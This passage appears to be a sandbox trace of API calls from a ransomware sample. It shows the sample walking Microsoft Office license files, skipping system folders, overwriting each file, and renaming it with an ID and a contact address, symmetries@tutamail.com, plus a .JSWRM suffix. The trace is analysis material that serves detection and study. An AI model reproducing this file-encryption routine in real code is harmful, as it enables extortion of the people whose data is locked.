lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0112.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0112.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0112.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0112.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0112.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.179] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0112.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0112.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0112.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0112.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0112.180] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecd92def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecd92def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xece2b7d7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d3d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordR_Trial-ul-oob.xrm-ms", cAlternateFileName="WO2ED9~1.XRM")) returned 1 [0112.180] lstrcmpiW (lpString1="WordR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0112.180] lstrcmpiW (lpString1="WordR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0112.180] lstrcmpiW (lpString1="WordR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0112.180] lstrcmpiW (lpString1="WordR_Trial-ul-oob.xrm-ms", lpString2="windows") returned 1 [0112.180] lstrcmpiW (lpString1="WordR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0112.180] lstrcmpiW (lpString1="WordR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0112.180] lstrcmpiW (lpString1="WordR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0112.180] lstrcmpiW (lpString1="WordR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.180] lstrcmpiW (lpString1="WordR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0112.180] lstrcmpiW (lpString1="WordR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0112.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0112.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Trial-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0112.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0112.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Trial-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241010, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0112.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0112.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Trial-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0112.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0112.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_Trial-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240f70, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0112.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0112.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0112.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0112.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.181] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11581) returned 1 [0112.181] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d30) returned 0x24c1d0 [0112.181] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d30, lpOverlapped=0x0) returned 1 [0112.184] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.184] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d30, lpOverlapped=0x0) returned 1 [0112.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.185] CloseHandle (hObject=0x45c) returned 1 [0112.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0112.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0112.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0112.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0112.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0112.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0112.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.186] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0112.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0112.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0112.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0112.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0112.187] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecfcf13b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecfcf13b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed08dd97, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a37, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="WORDVL~1.XRM")) returned 1 [0112.187] lstrcmpiW (lpString1="WordVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0112.187] lstrcmpiW (lpString1="WordVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0112.187] lstrcmpiW (lpString1="WordVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0112.187] lstrcmpiW (lpString1="WordVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned 1 [0112.187] lstrcmpiW (lpString1="WordVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned 1 [0112.187] lstrcmpiW (lpString1="WordVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned 1 [0112.187] lstrcmpiW (lpString1="WordVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0112.187] lstrcmpiW (lpString1="WordVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.187] lstrcmpiW (lpString1="WordVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned 1 [0112.187] lstrcmpiW (lpString1="WordVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned 1 [0112.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_KMS_Client-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0112.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_KMS_Client-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241038, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0112.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0112.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_KMS_Client-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0112.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_KMS_Client-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2413d0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0112.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0112.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0112.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0112.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0112.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.188] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6711) returned 1 [0112.188] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a30) returned 0x205850 [0112.188] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a30, lpOverlapped=0x0) returned 1 [0112.190] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.190] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a30, lpOverlapped=0x0) returned 1 [0112.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0112.190] CloseHandle (hObject=0x45c) returned 1 [0112.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0112.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0112.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0112.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0112.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0112.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0112.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.190] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0112.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0112.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0112.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0112.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0112.191] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede4358a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede4358a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee26f811, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d54, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="WO54B2~1.XRM")) returned 1 [0112.191] lstrcmpiW (lpString1="WordVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0112.192] lstrcmpiW (lpString1="WordVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0112.192] lstrcmpiW (lpString1="WordVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0112.192] lstrcmpiW (lpString1="WordVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned 1 [0112.192] lstrcmpiW (lpString1="WordVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0112.192] lstrcmpiW (lpString1="WordVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0112.192] lstrcmpiW (lpString1="WordVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0112.192] lstrcmpiW (lpString1="WordVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.192] lstrcmpiW (lpString1="WordVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0112.192] lstrcmpiW (lpString1="WordVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0112.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0112.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0112.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241268, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0112.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0112.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0112.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241290, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0112.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0112.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0112.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0112.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.193] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11604) returned 1 [0112.193] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0112.193] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0112.196] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.196] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0112.196] HeapFree (in: 